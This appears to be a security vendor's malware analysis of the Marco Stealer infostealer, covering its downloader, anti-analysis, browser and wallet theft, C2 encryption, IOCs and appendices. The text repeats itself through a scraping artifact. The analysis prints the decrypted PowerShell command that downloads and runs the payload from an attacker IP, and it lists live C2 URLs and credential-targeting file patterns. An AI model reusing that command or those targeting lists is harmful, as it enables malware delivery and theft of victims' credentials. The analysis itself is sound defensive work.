IntroductionZscaler ThreatLabz has discovered an information stealer that we named Marco Stealer, which was first observed in June 2025. Marco Stealer primarily targets browser data, cryptocurrency wallet information, files from popular cloud services like Dropbox and Google Drive, and other sensitive files stored on the victim’s system. Marco Stealer implements several anti-analysis techniques including string encryption and terminating security tools. The malware leverages HTTP for command-and-control (C2) with messages encrypted with 256-bit AES.Key TakeawaysThreatLabz discovered Marco Stealer in June 2025, an information stealer that focuses on exfiltrating browser data, cryptocurrency wallet information from browser extensions, and sensitive files (both locally and from cloud services).Marco Stealer builds a profile of the victim’s machine by collecting system information such as hardware ID and operating system version, as well as the victim’s IP address and geographical location.Marco Stealer uses named pipes to establish communication between its various components.Marco Stealer relies on encrypted strings that are decrypted only at runtime to avoid static analysis. In addition, the information stealer uses Windows APIs to detect anti-analysis tools like Wireshark, x64dbg, and Process Hacker.Stolen data is encrypted using AES-256 before being sent to C2 servers via HTTP POST requests.Attack ChainThe attack chain below shows how a campaign may deliver Marco Stealer to a victim’s system.Figure 1: Attack chain depicting the execution flow in campaigns delivering Marco Stealer.Technical AnalysisThis section provides a breakdown of Marco Stealer’s functionality, including its downloader, anti-analysis mechanisms, data collection techniques, and methods for exfiltrating stolen information.Downloader The downloader component decrypts multiple strings using AES-128 in ECB mode to generate a PowerShell command, which it executes as a child process to initiate the next stage of the attack. An example of the decrypted PowerShell command is shown below.cmdline:powershell.exe -ExecutionPolicy ByPass -Command “$client = New-Object System.Net.WebClient; $client.Headers.Add(‘X-Custom-Auth’, ‘eyJhbGciOiJJUzI1NiIsInR5cCI6IkpXVCJ9.c2FzdGVkX2NyZWRzXzg5N2E0OWIyZjZjNGViZDc1ZWQzNDlkNzI4MTc2NWRiX2MzOGVhYTQw’);
$client.Headers.Add(‘User-Agent’, ‘Zephyr-Downloader/3.7.18-zx9b (Compatible; QuartzCore/945; SageBridge/XRT-71a)’); $client.DownloadFile(‘http://217.156.50.228:8181/nujbOqrNYyLXXLmOhPpY/PNcWncSY.exe’, ‘C:UsersPJonesAppDataLocalTempknmQSGUZFILhFvaZ.exe’);
Start-Process ‘C:UsersPJonesAppDataLocalTempknmQSGUZFILhFvaZ.exe'”In this example, the WebClient object downloads the Marco Stealer executable file from the URL http[:/]/217[.]156[.]50[.]228[:]8181/nujbOqrNYyLXXLmOhPpY/PNcWncSY.exe to the temporary path AppDataLocalTempknmQSGUZFILhFvaZ.exe and executes it.Marco StealerMarco Stealer samples have the Program Database (PDB) file path C:UsersmarcoDesktopBuilderBuilderClientClientx64ReleaseClient.pdb. When Marco Stealer is executed, the malware employs a static mutex named GlobalItsMeRavenOnYourMachineed to ensure that only a single instance runs on the infected system at any given time.Anti-analysis techniques Marco Stealer leverages encrypted strings throughout its operations. These encrypted strings are used in nearly all functions and decrypted on execution. The string encryption algorithm is an add–rotate–XOR (ARX) based similar to ChaCha20. The full string decryption algorithm can be found in the ThreatLabz GitHub repository. Using Windows APIs, Marco Stealer enumerates running processes and retrieves their executable file paths. Once the paths are identified, the information stealer extracts the version metadata from the files, which includes:OriginalFilenameProductNameCompanyNameTo collect this metadata, Marco Stealer queries the following paths:VarFileInfoTranslation determines the language and code page of the file.StringFileInfoLANGCODEPAGE provides access to the fields listed above.If any of the metadata collected matches the name of a common anti-analysis tool such as x64dbg, Wireshark, Process Hacker, or OllyDbg, Marco Stealer terminates the corresponding process to evade analysis. Visit the Appendix section at the end of this blog for a comprehensive list of anti-analysis tools targeted by Marco Stealer.Following the initial checks, Marco Stealer verifies internet connectivity by attempting to reach https://www.google.com. If the machine is offline or the connection check fails, the information stealer initiates a self-deletion routine, removing its executable from the system and terminating its process. If the connectivity check succeeds, Marco Stealer begins gathering IP geolocation data. The information stealer queries services like https://ipinfo.io/ip and https://ipinfo.io/country to retrieve the external IP address and country code of the victim’s machine, which is sent to the C2 server.System data collectionAfter confirming internet connectivity, Marco Stealer initiates data collection to build a profile of the victim’s machine. The information stealer begins by querying the machine GUID from the Windows registry, generating a unique hardware identifier that serves as an infection identifier. All data gathered by Marco Stealer is encrypted using AES before being sent individually to the C2 server. The initial data transmission includes a client ID (hardcoded in each sample), hardware ID, and IP address. This information is also prepended to the exfiltration of any subsequent data collected by Marco stealer. Notably, screenshot data was the only instance observed where plaintext information was exfiltrated. Visit the Appendix section at the end of this blog for a list of the data collected by Marco Stealer.Marco Stealer looks for antivirus software by scanning the Windows Security Center registry path (ROOTSecurityCenter2). The malware performs Component Object Model (COM) interactions using DllCanUnloadNow and runs a Windows Management Instrumentation (WMI) query (SELECT * FROM AntiVirusProduct) to enumerate all active antivirus products installed on the device.Marco Stealer also collects installed software by querying specific registry keys, including: SOFTWAREMicrosoft”SOFTWAREMicrosoftWindowsCurrentVersionInstallerUserDataS-1-5-18ProductsWindowsCurrentVersionUninstaller From these registry locations, Marco Stealer extracts application names by reading the DisplayName field present in each subkey.Marco Stealer identifies all active processes on the system. It uses the QueryFullProcessImageNameW API to obtain the full file paths of running processes. Browser data exfiltrationMarco Stealer employs two distinct functions designed to exfiltrate browser data, leveraging two embedded files: chromeDecryptor.dll and needme.exe. These files are stored in the information stealer’s resource section. Marco Stealer first creates a directory in %appdata%localtemp, using the Mersenne Twister algorithm to generate a unique path. The malware then extracts the embedded files from the resource section and stores them in this newly created directory for further execution.Exfiltration via Chrome Appbound (chromeDecryptor.dll)The first method focuses on exfiltrating data from browser processes and involves the following steps:Marco Stealer enumerates all running processes, comparing them against a list of Chromium-based browser process names. If any matches are found, those processes are terminated.Marco Stealer extracts an executable from the resource section and drops it in the temporary directory as chromeDecryptor.dll. It sets an environment variable, Browser_TYPE, with chrome as the assigned value.Marco Stealer attempts to create a headless instance of the targeted Chromium-based browser. Upon successful creation, the information stealer injects chromeDecryptor.dll into the process using DLL injection techniques.The primary function of chromeDecryptor.dll is to decrypt the encryption key stored in the Chrome browser at AppDataLocalGoogleChromeUser DataLocal State.Once the decrypted key is retrieved, it is written to the file chrome_appbound_key.txt.The decrypted key is then used to query browser data stored in SQLite databases.Data collection via named pipe (needMe.exe)The second method of data collection involves named pipes. Marco Stealer initiates exfiltration by enumerating and terminating instances of various browsers, including lesser-known ones such as Basilisk, CLIQZ, and Pale Moon. After this process is complete, Marco Stealer extracts the previously mentioned needMe.exe executable. Next, Marco Stealer establishes a named pipe, \.pipeFirefoxBrowserExtractor, configured with bidirectional communication (PIPE_ACCESS_DUPLEX) and a buffer size of 8192 bytes (0x2000). The pipe waits for a client connection, which is later initiated by needMe.exe. When connected, the pipe enables the malware to ingest browser-related data from remote processes.The needMe.exe binary targets browser-related data stored in SQLite databases such as:C:Users\AppDataRoamingBasilisk-DevBasiliskProfilesC:Users\AppDataRoamingCLIQZProfilesC:Users\AppDataRoamingMozillaFirefoxProfilesC:Users\AppDataRoamingFlashPeakSlimBrowserProfilesC:Users\AppDataRoamingMoonchild ProductionsPale MoonProfilesCryptocurrency wallet data extraction using extensionsMarco Stealer focuses on extracting cryptocurrency wallet data in Chromium-based browsers. A comprehensive list of targeted browsers is available in the Appendix section at the end of this blog.Marco Stealer scans typical user data directories under paths such as:C:Users\AppDataLocal\User DataOnce Marco Stealer identifies target directories, it validates their existence using the GetFileAttributes API. Upon locating extension directories containing cryptocurrency wallet data, the information stealer extracts, encrypts, and exfiltrates the data to a C2 server.Data collected across popular servicesMarco Stealer collects data from different software, applications, and services. Visit the Appendix section of this blog for a comprehensive table that includes the file paths or registry keys targeted, data collected, and additional technical details clarifying how this data is leveraged or encrypted/decoded.Additional data theftClipboard content is also targeted, with Marco Stealer harvesting data for any sensitive information copied by the user. Marco Stealer is also capable of capturing screenshots, and designed to recursively search through a wide range of commonly used local directories and cloud service locations to locate sensitive files, such as:AppDataLocalDesktopDocumentsDownloadsPicturesVideosMusicOneDriveDropboxGoogle DriveMicrosoftOneDriveMicrosoftOfficeDropboxThe information stealer looks for files with names or extensions that are likely to contain confidential information. Visit the Appendix section at the end of this blog for a table that shows targeted file patterns (text, documents, spreadsheets, database, images, and backup files) identified using keywords.C2 communicationMarco Stealer uses AES-256 CBC encryption to protect stolen data that is sent to its C2 server. To begin the encryption process, the information stealer generates a SHA-256 hash of a hardcoded value. The resulting hash is used to derive an AES-256 encryption key via the CryptDeriveKey function. While the AES encryption key is derived dynamically, the result will always be the same and thus the actual key is static. The encrypted data, including the victim’s client ID and hardware ID, is then sent to the predefined C2 endpoint (e.g., http://45.74.19[.]20:49259/receive) via an HTTP POST request with HTTP User-Agent field set to DataSender.The data in the HTTP body is sent in the format (prior to encryption):Client ID: [client_id]Hardware ID: [hwid]IP Address: [ip_addr]Stolen data
Conclusion Marco Stealer is a new information stealer designed to steal browser data, cryptocurrency wallet information, and sensitive files (both locally and from cloud services). The malware employs string encryption and attempts to defeat dynamic analysis tools. Network communications are protected by 256-bit AES-256 encryption to transmit stolen data over HTTP. Despite recent law enforcement actions that have taken aim at several information stealers such as Rhadamanthys and Lumma, the market for these malware tools remains significant. As a result, new information stealers are regularly being created and continue to pose significant threats to corporate environments.Zscaler CoverageThe Zscaler Cloud Sandbox has been successful in detecting this campaign. The figure below depicts the Zscaler Cloud Sandbox, showing detection details for Marco Stealer.Figure 2: Zscaler Cloud Sandbox report for Marco Stealer.In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to this campaign at various levels with the following threat names:Win64.Downloader.MarcoWin64.PWS.MarcoIndicators Of Compromise (IOCs)IOCTypehttp[:/]/217[.]156[.]50[.]228[:]8185/LoqnOOuuIsTIYfkrdsfL/eUelHAyY.exeDownloading URL34deb6594098545d7ffb98844f0790bfZIP3a3e8f6bc70748a39ffc047b3c86a665ZIP5eb91d1ad26c7eced894e34710aaa28eZIP1042affb0ca6758ca0043112cdc7eda2Downloadera98fa5fba55e470750ae74186c15fa73Downloader33dd8a5e234d911391cc8c301dc4a606Downloader49ab8d4c55b7f64eaba699ef0dc9054bMarco Stealer661a5465d9a322276ebc414f39891a8bMarco Stealer028604d6aa556de2ae4ca6b31e600677Marco Stealerhttp[://]107[.]189[.]25[.]189[:]49259/receiveC2 serverhttp[://]45[.]74[.]19[.]20[:]49259/receiveC2 serverMITRE ATT&CK FrameworkTacticIDTechnique NameDescriptionExecution, Defense Evasion, DiscoveryT1047Windows Management InstrumentationAdversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and scripts, collect information about the system, or to establish persistence.DiscoveryT1016System Network Configuration DiscoveryAdversaries may attempt to get information about the network configuration of a system or systems, including IP address, DNS servers, and network adapters.Command and ControlT1071Application Layer ProtocolAdversaries may communicate using application layer protocols to avoid detection, blend in with legitimate network traffic, or enable C2 on a network that restricts other protocols.ExecutionT1059Command and Scripting InterpreterAdversaries may abuse command and scripting interpreters to execute commands, scripts, or binaries. These interpreters are often pre-installed on systems, such as cmd.exe, PowerShell, or Python.DiscoveryT1057Process DiscoveryAdversaries may attempt to get information about running processes on a system. This information can be used to identify security solutions, analyze running services, or to find processes that can be injected.Execution, Command and ControlT1105Ingress Tool TransferAdversaries may transfer tools or other files from an external system into a compromised environment. This can be done via various means, including HTTP/S, FTP, SMB, or custom protocols.DiscoveryT1082System Information DiscoveryAdversaries may attempt to get detailed information about the operating system and hardware, including the system’s name, version, and architecture of a system. This information helps in further planning and execution of attacks.Command and ControlT1573Encrypted ChannelAdversaries may communicate using a channel that has been encrypted to conceal the content of their traffic. This can be done using standard encryption protocols like TLS/SSL or custom encryption schemes.DiscoveryT1518.001Security Software DiscoveryAdversaries may attempt to get information about installed security software and tools, such as antivirus, EDR solutions, or firewalls. This helps them identify potential defenses to bypass or disable.AppendixAnti-analysis toolsThe table below includes a comprehensive list of anti-analysis tools targeted by Marco Stealer.Cheat EnginednspyILSpyWiresharkProcess MonitorVB PCode DecompilerProcess HackerWinHexPE ExplorerDumpcapMalware Initial AssessmentDecompiler for p-code and native code filesCommon File Form at ExplorerHex WorkshopW32Dasm for WindowsHxD Hex EditornpDB Browser for SQLitermega dumpollydbgInteractive Delphi ReconstructorThe InteractiveDisassemblerx64dbgHacker’s DisassemblerSystem InformerNavicat Premium3Stud_PE MFC ApplicationThe Interactive DisassemblerExEinfo PE – Win32 exe identifierJava(TM) Platform SE binarySystem activity monitorRegshot 1.9.0 x86Sysinternals Process ExplorerAutostart program viewerResource viewerSysinternals Tcp ViewRegshot 1.9.0 x64 ANSIOpenJDK Platform binaryAPI Monitor v2 (Alpha) 32-bitRegshot 1.9.0 x64 UnicodeTiny AutoIt3 Decompiler EditorAPI Monitor v2 (Alpha) 64-bitRegshot 1.9.0 x86 UnicodeEnigmaVBUnpacker – static Enigma Virtual Box unpacker010 Editor – Pro Text/Hex EditorPiD Team’s Protection ID.-bitNauz File Detector(NFD) is a linker/compiler/packer identifier utilityRestorator: Edit Resources and User Interface System data collectedThe table below is a list of the data collected by Marco Stealer.Client IDHardware IDIP addressCountry codeOS versionLocal dateTime zoneComputerNameAUserNameAHostnameComputerNameNetBIOSLanguageAntivirus softwareRAM sizeCPU vendorCPU nameCPU threadsCPU coresGPU(s)Display resolutionInstalled softwareRunning processesClipboard contentScreenshot data Targeted file patternsThe following tables show targeted file patterns (text, documents, spreadsheets, database, images, and backup files) identified using keywords.Private information*private*.txt*secret*.txt*important*.txt*note*.txt*data*.txt Credentials and authentication*password*.doc*pass*.txt*login*.txt*cred*.txt*auth*.txt*2fa*.txt*otp*.txt*account*.xls*ssn*.txt Cryptocurrency-related data*wallet*.txt*bitcoin*.txt*btc*.txt*eth*.txt*ledger*.txt*trezor*.txt*metamask*.txt*coinbase*.txt*binance*.txt*exodus*.txt*electrum*.txt*trust*.txt*seed*.png Financial data*bank*.jpg*card*.jpg*invoice*.pdf*tax*.pdf*backup*.sql*account*.accdb Password manager files*.kbdx*.kdb*.1pif*.opvault*.agilekeychain*.lastpass*.dashlane Screenshots or captured images*screen*.jpg*printscreen*.jpg*screenshot*.png*snip*.png*capture*.png Popular servicesThe following table includes the file paths or registry keys targeted, data collected, and additional technical details clarifying how this data is leveraged or encrypted/decoded.Function nameFile/registry pathData collectedAdditional informationDiscord DataAppDataRoamingDiscordLocal Storageleveldb AppDataRoamingDiscordptbLocal Storageleveldb AppDataRoamingDiscordcanaryLocal Storageleveldb AppDataRoamingLightcordLocal Storageleveldbtokens, cookies, and moreMarco Stealer retrieves file metadata using structures like nFileSizeLow, nFileSizeHigh, ftLastWriteTime, and dwFileAttributes, which help determine file presence, modification timestamps, and other file system attributes before attempting to read or extract the data.Telegram DataAppDataRoamingTelegram Desktoptdatacountries, key_datas, prefix, settings, shortcuts-custom.json, shortcuts-default.json, usertag, content.The decryption keys are stored locally in key_datas.Steam Video GameSoftwareValveSteama_1SoftwareValveSteamconfigconfig.vdfTo parse the contents of config.vdf, Marco Stealer employs a regular expression: “([^”]*)”s+”([^”]*)”.Proton VPNAppDataLocalProtonProton VPNData under “ProtonProton VPN”Marco Stealer performs a memory scan in the backward direction, searching for ProtonVPN-associated URLs like “ProtonVPN_Url” and content artifacts.FileZilla%APPDATA%FileZillarecentservers.xml, sitemanager.xmlThese XML files store FTP connection profiles, including host, port, username, and password fields, in plaintext or Base64-encoded plaintext.WindscribeHKEY_CURRENT_USERSoftwareWindscribeInstallerHKEY_CURRENT_USERSoftwareWindscribeWindscribe2capturing sensitive fields like authHash, userId, wireguardConfig, and customOvpnAuthsThese fields contain hashed credentials, unique user identifiers, VPN configuration for both OpenVPN and WireGuard, and internal VPN engine or networking settings.Ubisoft Game LauncherAppDataLocalUbisoft Game LauncherAll files at Ubisoft Game Launcher.* Battle.netAppDataLocalBattle.net“.config” and “.db” at given pathMarco Stealer specifically looks for critical files such as “.config” and “.db”, which may contain sensitive configuration or database information.OutlookSoftwareMicrosoftWindows MessagingSubsystemProfiles9375CFF0413111d3B88A00104B2A66768ASMTP Email Address2, SMTP Server, POP3 User Name9, NNTP Email Address, NNTP User Name, IMAP Server, IMAP User Name, Email, HTTP User, HTTP Server URL, POP3 User, IMAP User, HTTPMail User Name, HTTPMail Server, SMTP User, POP3 Password2, IMAP Password2, NNTP Password2, HTTPMail Password2, SMTP Password2, POP3 Password, IMAP Password, NNTP Password, and HTTPMail PasswordAfter decrypting the strings mentioned above, Marco Stealer enumerates them, indicating that the functionality is enumerating user email profile information from the registry.Password ManagerAppdataLocal(could be different for different password managers)1Password Nightly, commonkey, dashlane, KeePassXC, Keeper, LastPass, MYKI, NordPass, RoboForm, Splikity, Zoho Vault, 1Password Beta, BitwardenBy locating and accessing the data directories or configuration files associated with these applications, Marco Stealer attempts to extract saved credentials. Targeted browsersThe following table is a comprehensive list of browsers targeted by Marco Stealer.Google ChromeEpic Privacy BrowserAVAST Software BrowserLenovo SLBrowserBraveSoftwareGoogle Chrome DevCentBrowserComodo DragonBlackHawk BrowserCoowon CoowonGoogle Chrome BetaGoogle Chrome SxSBliskCryptoTab BrowserAVG BrowserInsomniacBrowserCCleaner BrowserLiebaoAIChromiumCatalinaGroup CitrioCocCoc BrowserMicrosoft Edge DevMicrosoft Edge
[#item_full_content] [[{“value”:”IntroductionZscaler ThreatLabz has discovered an information stealer that we named Marco Stealer, which was first observed in June 2025. Marco Stealer primarily targets browser data, cryptocurrency wallet information, files from popular cloud services like Dropbox and Google Drive, and other sensitive files stored on the victim’s system. Marco Stealer implements several anti-analysis techniques including string encryption and terminating security tools. The malware leverages HTTP for command-and-control (C2) with messages encrypted with 256-bit AES.Key TakeawaysThreatLabz discovered Marco Stealer in June 2025, an information stealer that focuses on exfiltrating browser data, cryptocurrency wallet information from browser extensions, and sensitive files (both locally and from cloud services).Marco Stealer builds a profile of the victim’s machine by collecting system information such as hardware ID and operating system version, as well as the victim’s IP address and geographical location.Marco Stealer uses named pipes to establish communication between its various components.Marco Stealer relies on encrypted strings that are decrypted only at runtime to avoid static analysis. In addition, the information stealer uses Windows APIs to detect anti-analysis tools like Wireshark, x64dbg, and Process Hacker.Stolen data is encrypted using AES-256 before being sent to C2 servers via HTTP POST requests.Attack ChainThe attack chain below shows how a campaign may deliver Marco Stealer to a victim’s system.Figure 1: Attack chain depicting the execution flow in campaigns delivering Marco Stealer.Technical AnalysisThis section provides a breakdown of Marco Stealer’s functionality, including its downloader, anti-analysis mechanisms, data collection techniques, and methods for exfiltrating stolen information.Downloader The downloader component decrypts multiple strings using AES-128 in ECB mode to generate a PowerShell command, which it executes as a child process to initiate the next stage of the attack. An example of the decrypted PowerShell command is shown below.cmdline:powershell.exe -ExecutionPolicy ByPass -Command “$client = New-Object System.Net.WebClient; $client.Headers.Add(‘X-Custom-Auth’, ‘eyJhbGciOiJJUzI1NiIsInR5cCI6IkpXVCJ9.c2FzdGVkX2NyZWRzXzg5N2E0OWIyZjZjNGViZDc1ZWQzNDlkNzI4MTc2NWRiX2MzOGVhYTQw’);
$client.Headers.Add(‘User-Agent’, ‘Zephyr-Downloader/3.7.18-zx9b (Compatible; QuartzCore/945; SageBridge/XRT-71a)’); $client.DownloadFile(‘http://217.156.50.228:8181/nujbOqrNYyLXXLmOhPpY/PNcWncSY.exe’, ‘C:UsersPJonesAppDataLocalTempknmQSGUZFILhFvaZ.exe’);
Start-Process ‘C:UsersPJonesAppDataLocalTempknmQSGUZFILhFvaZ.exe'”In this example, the WebClient object downloads the Marco Stealer executable file from the URL http[:/]/217[.]156[.]50[.]228[:]8181/nujbOqrNYyLXXLmOhPpY/PNcWncSY.exe to the temporary path AppDataLocalTempknmQSGUZFILhFvaZ.exe and executes it.Marco StealerMarco Stealer samples have the Program Database (PDB) file path C:UsersmarcoDesktopBuilderBuilderClientClientx64ReleaseClient.pdb. When Marco Stealer is executed, the malware employs a static mutex named GlobalItsMeRavenOnYourMachineed to ensure that only a single instance runs on the infected system at any given time.Anti-analysis techniques Marco Stealer leverages encrypted strings throughout its operations. These encrypted strings are used in nearly all functions and decrypted on execution. The string encryption algorithm is an add–rotate–XOR (ARX) based similar to ChaCha20. The full string decryption algorithm can be found in the ThreatLabz GitHub repository. Using Windows APIs, Marco Stealer enumerates running processes and retrieves their executable file paths. Once the paths are identified, the information stealer extracts the version metadata from the files, which includes:OriginalFilenameProductNameCompanyNameTo collect this metadata, Marco Stealer queries the following paths:VarFileInfoTranslation determines the language and code page of the file.StringFileInfoLANGCODEPAGE provides access to the fields listed above.If any of the metadata collected matches the name of a common anti-analysis tool such as x64dbg, Wireshark, Process Hacker, or OllyDbg, Marco Stealer terminates the corresponding process to evade analysis. Visit the Appendix section at the end of this blog for a comprehensive list of anti-analysis tools targeted by Marco Stealer.Following the initial checks, Marco Stealer verifies internet connectivity by attempting to reach https://www.google.com. If the machine is offline or the connection check fails, the information stealer initiates a self-deletion routine, removing its executable from the system and terminating its process. If the connectivity check succeeds, Marco Stealer begins gathering IP geolocation data. The information stealer queries services like https://ipinfo.io/ip and https://ipinfo.io/country to retrieve the external IP address and country code of the victim’s machine, which is sent to the C2 server.System data collectionAfter confirming internet connectivity, Marco Stealer initiates data collection to build a profile of the victim’s machine. The information stealer begins by querying the machine GUID from the Windows registry, generating a unique hardware identifier that serves as an infection identifier. All data gathered by Marco Stealer is encrypted using AES before being sent individually to the C2 server. The initial data transmission includes a client ID (hardcoded in each sample), hardware ID, and IP address. This information is also prepended to the exfiltration of any subsequent data collected by Marco stealer. Notably, screenshot data was the only instance observed where plaintext information was exfiltrated. Visit the Appendix section at the end of this blog for a list of the data collected by Marco Stealer.Marco Stealer looks for antivirus software by scanning the Windows Security Center registry path (ROOTSecurityCenter2). The malware performs Component Object Model (COM) interactions using DllCanUnloadNow and runs a Windows Management Instrumentation (WMI) query (SELECT * FROM AntiVirusProduct) to enumerate all active antivirus products installed on the device.Marco Stealer also collects installed software by querying specific registry keys, including: SOFTWAREMicrosoft”SOFTWAREMicrosoftWindowsCurrentVersionInstallerUserDataS-1-5-18ProductsWindowsCurrentVersionUninstaller From these registry locations, Marco Stealer extracts application names by reading the DisplayName field present in each subkey.Marco Stealer identifies all active processes on the system. It uses the QueryFullProcessImageNameW API to obtain the full file paths of running processes. Browser data exfiltrationMarco Stealer employs two distinct functions designed to exfiltrate browser data, leveraging two embedded files: chromeDecryptor.dll and needme.exe. These files are stored in the information stealer’s resource section. Marco Stealer first creates a directory in %appdata%localtemp, using the Mersenne Twister algorithm to generate a unique path. The malware then extracts the embedded files from the resource section and stores them in this newly created directory for further execution.Exfiltration via Chrome Appbound (chromeDecryptor.dll)The first method focuses on exfiltrating data from browser processes and involves the following steps:Marco Stealer enumerates all running processes, comparing them against a list of Chromium-based browser process names. If any matches are found, those processes are terminated.Marco Stealer extracts an executable from the resource section and drops it in the temporary directory as chromeDecryptor.dll. It sets an environment variable, Browser_TYPE, with chrome as the assigned value.Marco Stealer attempts to create a headless instance of the targeted Chromium-based browser. Upon successful creation, the information stealer injects chromeDecryptor.dll into the process using DLL injection techniques.The primary function of chromeDecryptor.dll is to decrypt the encryption key stored in the Chrome browser at AppDataLocalGoogleChromeUser DataLocal State.Once the decrypted key is retrieved, it is written to the file chrome_appbound_key.txt.The decrypted key is then used to query browser data stored in SQLite databases.Data collection via named pipe (needMe.exe)The second method of data collection involves named pipes. Marco Stealer initiates exfiltration by enumerating and terminating instances of various browsers, including lesser-known ones such as Basilisk, CLIQZ, and Pale Moon. After this process is complete, Marco Stealer extracts the previously mentioned needMe.exe executable. Next, Marco Stealer establishes a named pipe, \.pipeFirefoxBrowserExtractor, configured with bidirectional communication (PIPE_ACCESS_DUPLEX) and a buffer size of 8192 bytes (0x2000). The pipe waits for a client connection, which is later initiated by needMe.exe. When connected, the pipe enables the malware to ingest browser-related data from remote processes.The needMe.exe binary targets browser-related data stored in SQLite databases such as:C:Users\AppDataRoamingBasilisk-DevBasiliskProfilesC:Users\AppDataRoamingCLIQZProfilesC:Users\AppDataRoamingMozillaFirefoxProfilesC:Users\AppDataRoamingFlashPeakSlimBrowserProfilesC:Users\AppDataRoamingMoonchild ProductionsPale MoonProfilesCryptocurrency wallet data extraction using extensionsMarco Stealer focuses on extracting cryptocurrency wallet data in Chromium-based browsers. A comprehensive list of targeted browsers is available in the Appendix section at the end of this blog.Marco Stealer scans typical user data directories under paths such as:C:Users\AppDataLocal\User DataOnce Marco Stealer identifies target directories, it validates their existence using the GetFileAttributes API. Upon locating extension directories containing cryptocurrency wallet data, the information stealer extracts, encrypts, and exfiltrates the data to a C2 server.Data collected across popular servicesMarco Stealer collects data from different software, applications, and services. Visit the Appendix section of this blog for a comprehensive table that includes the file paths or registry keys targeted, data collected, and additional technical details clarifying how this data is leveraged or encrypted/decoded.Additional data theftClipboard content is also targeted, with Marco Stealer harvesting data for any sensitive information copied by the user. Marco Stealer is also capable of capturing screenshots, and designed to recursively search through a wide range of commonly used local directories and cloud service locations to locate sensitive files, such as:AppDataLocalDesktopDocumentsDownloadsPicturesVideosMusicOneDriveDropboxGoogle DriveMicrosoftOneDriveMicrosoftOfficeDropboxThe information stealer looks for files with names or extensions that are likely to contain confidential information. Visit the Appendix section at the end of this blog for a table that shows targeted file patterns (text, documents, spreadsheets, database, images, and backup files) identified using keywords.C2 communicationMarco Stealer uses AES-256 CBC encryption to protect stolen data that is sent to its C2 server. To begin the encryption process, the information stealer generates a SHA-256 hash of a hardcoded value. The resulting hash is used to derive an AES-256 encryption key via the CryptDeriveKey function. While the AES encryption key is derived dynamically, the result will always be the same and thus the actual key is static. The encrypted data, including the victim’s client ID and hardware ID, is then sent to the predefined C2 endpoint (e.g., http://45.74.19[.]20:49259/receive) via an HTTP POST request with HTTP User-Agent field set to DataSender.The data in the HTTP body is sent in the format (prior to encryption):Client ID: [client_id]Hardware ID: [hwid]IP Address: [ip_addr]Stolen data
Conclusion Marco Stealer is a new information stealer designed to steal browser data, cryptocurrency wallet information, and sensitive files (both locally and from cloud services). The malware employs string encryption and attempts to defeat dynamic analysis tools. Network communications are protected by 256-bit AES-256 encryption to transmit stolen data over HTTP. Despite recent law enforcement actions that have taken aim at several information stealers such as Rhadamanthys and Lumma, the market for these malware tools remains significant. As a result, new information stealers are regularly being created and continue to pose significant threats to corporate environments.Zscaler CoverageThe Zscaler Cloud Sandbox has been successful in detecting this campaign. The figure below depicts the Zscaler Cloud Sandbox, showing detection details for Marco Stealer.Figure 2: Zscaler Cloud Sandbox report for Marco Stealer.In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to this campaign at various levels with the following threat names:Win64.Downloader.MarcoWin64.PWS.MarcoIndicators Of Compromise (IOCs)IOCTypehttp[:/]/217[.]156[.]50[.]228[:]8185/LoqnOOuuIsTIYfkrdsfL/eUelHAyY.exeDownloading URL34deb6594098545d7ffb98844f0790bfZIP3a3e8f6bc70748a39ffc047b3c86a665ZIP5eb91d1ad26c7eced894e34710aaa28eZIP1042affb0ca6758ca0043112cdc7eda2Downloadera98fa5fba55e470750ae74186c15fa73Downloader33dd8a5e234d911391cc8c301dc4a606Downloader49ab8d4c55b7f64eaba699ef0dc9054bMarco Stealer661a5465d9a322276ebc414f39891a8bMarco Stealer028604d6aa556de2ae4ca6b31e600677Marco Stealerhttp[://]107[.]189[.]25[.]189[:]49259/receiveC2 serverhttp[://]45[.]74[.]19[.]20[:]49259/receiveC2 serverMITRE ATT&CK FrameworkTacticIDTechnique NameDescriptionExecution, Defense Evasion, DiscoveryT1047Windows Management InstrumentationAdversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and scripts, collect information about the system, or to establish persistence.DiscoveryT1016System Network Configuration DiscoveryAdversaries may attempt to get information about the network configuration of a system or systems, including IP address, DNS servers, and network adapters.Command and ControlT1071Application Layer ProtocolAdversaries may communicate using application layer protocols to avoid detection, blend in with legitimate network traffic, or enable C2 on a network that restricts other protocols.ExecutionT1059Command and Scripting InterpreterAdversaries may abuse command and scripting interpreters to execute commands, scripts, or binaries. These interpreters are often pre-installed on systems, such as cmd.exe, PowerShell, or Python.DiscoveryT1057Process DiscoveryAdversaries may attempt to get information about running processes on a system. This information can be used to identify security solutions, analyze running services, or to find processes that can be injected.Execution, Command and ControlT1105Ingress Tool TransferAdversaries may transfer tools or other files from an external system into a compromised environment. This can be done via various means, including HTTP/S, FTP, SMB, or custom protocols.DiscoveryT1082System Information DiscoveryAdversaries may attempt to get detailed information about the operating system and hardware, including the system’s name, version, and architecture of a system. This information helps in further planning and execution of attacks.Command and ControlT1573Encrypted ChannelAdversaries may communicate using a channel that has been encrypted to conceal the content of their traffic. This can be done using standard encryption protocols like TLS/SSL or custom encryption schemes.DiscoveryT1518.001Security Software DiscoveryAdversaries may attempt to get information about installed security software and tools, such as antivirus, EDR solutions, or firewalls. This helps them identify potential defenses to bypass or disable.AppendixAnti-analysis toolsThe table below includes a comprehensive list of anti-analysis tools targeted by Marco Stealer.Cheat EnginednspyILSpyWiresharkProcess MonitorVB PCode DecompilerProcess HackerWinHexPE ExplorerDumpcapMalware Initial AssessmentDecompiler for p-code and native code filesCommon File Form at ExplorerHex WorkshopW32Dasm for WindowsHxD Hex EditornpDB Browser for SQLitermega dumpollydbgInteractive Delphi ReconstructorThe InteractiveDisassemblerx64dbgHacker’s DisassemblerSystem InformerNavicat Premium3Stud_PE MFC ApplicationThe Interactive DisassemblerExEinfo PE – Win32 exe identifierJava(TM) Platform SE binarySystem activity monitorRegshot 1.9.0 x86Sysinternals Process ExplorerAutostart program viewerResource viewerSysinternals Tcp ViewRegshot 1.9.0 x64 ANSIOpenJDK Platform binaryAPI Monitor v2 (Alpha) 32-bitRegshot 1.9.0 x64 UnicodeTiny AutoIt3 Decompiler EditorAPI Monitor v2 (Alpha) 64-bitRegshot 1.9.0 x86 UnicodeEnigmaVBUnpacker – static Enigma Virtual Box unpacker010 Editor – Pro Text/Hex EditorPiD Team’s Protection ID.-bitNauz File Detector(NFD) is a linker/compiler/packer identifier utilityRestorator: Edit Resources and User Interface System data collectedThe table below is a list of 